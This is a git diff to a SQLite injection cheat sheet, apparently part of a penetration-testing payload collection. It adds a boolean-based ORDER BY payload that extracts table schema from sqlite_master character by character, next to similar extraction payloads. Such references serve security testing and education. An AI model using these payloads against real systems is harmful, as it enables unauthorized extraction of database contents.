diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md
index 6355d74..8e02d7f 100644
--- a/SQL Injection/SQLite Injection.md	
+++ b/SQL Injection/SQLite Injection.md	
@@ -72,6 +72,12 @@ and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name
 and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
 ```
 
+## Boolean - Extract info (order by)
+
+```sql
+CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
+```
+
 ## Boolean - Error based
 
 ```sql